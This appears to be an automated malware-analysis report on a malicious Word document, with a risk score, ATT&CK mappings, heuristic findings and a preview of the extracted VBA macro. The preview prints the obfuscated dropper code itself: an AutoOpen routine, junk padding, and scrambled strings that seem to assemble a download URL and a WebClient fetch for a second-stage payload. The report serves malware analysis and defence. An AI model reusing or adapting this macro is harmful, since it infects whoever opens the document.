MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a critical 'Shell()' call within its VBA macros, specifically triggered by the AutoOpen macro. This indicates the document is designed to execute arbitrary code upon opening, likely to download and run a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6546218-0' further supports its dropper functionality.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6546399-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6546399-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 152760 bytes |
SHA-256: 75188e6b5412510c35045c512624f0c4f473d53f4b4463fdd1c0069a29dbcbca |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zTCMCLsEMm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub aifnRX(kSzKz)
jMPIT = GMwOdb
uVvuH = buGvHd + CDbl(29929 - dPmzE - ALkVFJ + CDbl(45973)) - 38925 - CDbl(30358)
PCMOdz = XrPXPZ
HiDId = 92680
End Sub
Sub RZwBi(ZowWHi)
jFRAqj = OGoHll
ObFPr = QwcPN + CDbl(90592 - PissP - vkBMCS + CDbl(94235)) - 41972 - CDbl(96046)
kpQzR = NsHQL
hcBnu = 38989
fNwrA = jMOCzu
Snsawz = EVzlzZ + CDbl(66352 - YLPXc - SzowP + CDbl(14407)) - 64700 - CDbl(98469)
qJWNuu = bqwZGJ
KsbHh = 76446
maRmz = EbhqME
JccLn = ojZaC + CDbl(9116 - jdGoA - LwDiF + CDbl(51779)) - 89747 - CDbl(9729)
zIGNBn = iPPTa
TNAOhq = 12323
End Sub
Sub VsqMtZ(tXktC)
kQTpD = iurYh
Mcqhq = DwEdQQ + CDbl(461 - Ozori - XqjwhY + CDbl(59055)) - 41959 - CDbl(53727)
iTJmhw = MhrpD
GADpu = 13497
GzuHCW = tASOhW
zwHNb = jcKmk + CDbl(38513 - cwdijO - aiZCkK + CDbl(6356)) - 43222 - CDbl(21786)
dHhjH = vcTpw
pIWikR = 94140
End Sub
Sub Autoopen()
On Error Resume Next
jiTaz = WFcQN
RvJcn = VrhGQ + CDbl(47973 - woRfC - mZofwo + CDbl(13075)) - 66592 - CDbl(75108)
qzDcjM = wtvfvF
cOuZAf = 10269
PnGYscEinpZ (Zqbnc + ZXJwwolIK + KojWi)
qGNwQ = uSmHuq
zCkuj = HcRZMA + CDbl(92401 - foFOIN - wVAzIQ + CDbl(71805)) - 74753 - CDbl(75848)
wlSdM = uzoah
hAwUB = 27985
End Sub
Sub hslcZA(jzXRWp)
HQPdFT = KPUnN
ozAnO = JGZKI + CDbl(87404 - fpzbXE - vZkhrw + CDbl(91100)) - 28305 - CDbl(42411)
RpMcrk = kDzjXh
HjcnZ = 26859
ziVcPP = wSbuk
tShBnF = rTELY + CDbl(84883 - aIUHpI - UGqzcU + CDbl(55602)) - 76527 - CDbl(71339)
mnkMo = bAUNw
iJEXkt = 77276
TFcHYL = BKkXDi
ZlHRlF = HVurqc + CDbl(64033 - FjjznE - KcncLZ + CDbl(79980)) - 67844 - CDbl(80184)
uzkTPT = iEMkh
hiJHE = 2044
End Sub
Sub Dvcsai(ItURlF)
wfzbpQ = RirwdM
uCSki = pwVrs + CDbl(72220 - zokuwc - lDMfP + CDbl(69818)) - 23723 - CDbl(74654)
kvzRY = rBhDD
zKFjE = 53728
End Sub
Attribute VB_Name = "czzwAvUqqmV"
Sub pClkwv(QkziN)
ZIntGw = IjKPn
wWEYAP = FOGLZ + CDbl(17461 - kLsiOj - bmjzj + CDbl(81296)) - 20647 - CDbl(79899)
sWzzw = MMzTBp
CcTzI = 51261
End Sub
Function ZXJwwolIK()
On Error Resume Next
rfADtV = XaQZAQ
NpcJp = zjhviO + CDbl(32100 - Eimhks - MWtGd + CDbl(27924)) - 77077 - CDbl(72329)
uAZCom = nSozKw
ViEzT = 93102
oziKn = kAFiiR
jGTsq = ZuKaXt + CDbl(51882 - wcjZb - OrBfw + CDbl(79673)) - 75339 - CDbl(44440)
vTDsXD = PShSG
iYGQM = 66326
Nwjtq = VrwsC("jR,pjl+Y1l/60Z0Y1l+Y1ldy4o/tY1l+Y1lneilY1l+Y1lc_te'+'nY1l+Y1lpsa/mY1l+Y1l'+'oc.odafaz//:pY1l+'+'Y1lt'+'th@Y1l+Y1l/gY1l+Y1l43lHC/Y1l+Y1lmoc", 55176 + 2 - 55176, 55176 + 132 - 55176)
XYIDJr = EotBpC
PGUBD = jNNrI + CDbl(2909 - NcYicE - JWLzjf + CDbl(26200)) - 21335 - CDbl(52197)
fcDGP = mPIVH
LQuHz = 54669
VjMqb = pqQZGS
WCqswo = DGuIw + CDbl(95081 - zbwWCb - WVpBd + CDbl(89308)) - 23404 - CDbl(48401)
RHUtC = wUpmU
OoDrd = 77531
Wrhpzhrzzj = VrwsC("Ou0Dl+Y1lifQY1l+Y1llnWiY1l+Y1lfY1l+Y1lQoDyY1l+Y1lpF.UYYxFe{yY1l+Y1lrtY1l+Y1l{)XCDAxFe'+' ni cfsaxFY1l+Y'+'1le(hcaY1'+'l+Y1lerY1l+Y143HE", 53680 + 5 - 53680, 53680 + 127 - 53680)
OTDEqV = jBrSu
ihdBi = wzicj + CDbl(30237 - vIjlJ - GWKFN + CDbl(5269)) - 56564 - CDbl(46430)
WvdXs = lhLBM
rskrW = 77977
EESVs = YhljR
ZWdwG = ssAKMi + CDbl(36746 - tYREN - NznJw + CDbl(35465)) - 45203 - CDbl(93602)
zzLHt = qvoBw
LCuroC = 38952
FGhZtNc = VrwsC("NY//:ptYOptQT", 67926 + 6 - 67926, 67926 + 6 - 67926)
AQhSGz = iTwnKv
DKAXZD = cdCOT + CDbl(3908 - tRKQDV - hRsBu + CDbl(86135)) - 17021 - CDbl(53156)
NowZzj = RcQZXm
EnzjoC = 76918
zpjPLv = Jzbarz
FLquA = PnOHHu + CDbl(23905 - lPkSIk - uoPmfI + CDbl(19811)) - 18830 - CDbl(14803)
hifvi = pSmbJ
ZHRjJY = 65870
wvRmv = VrwsC("tRdAlW+ktWenktW(Y1l+Y'+'1l. = UYYxFe;modnar )ktWtkY1l+Y1ltW+ktWceY1l+Y1ljbo-wktWY1l+j@", 45514 + 3 - 45514, 45514 + 80 - 45514)
IjMJKW = IUaFiG
aQhtCE = zVJnTP + CDbl(16053 - wwmbR - zRVkL + CDbl(69055)) - 64454 - CDbl(96315)
WfUqh = CQVdv
NDWqH = 35061
AWSDa =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.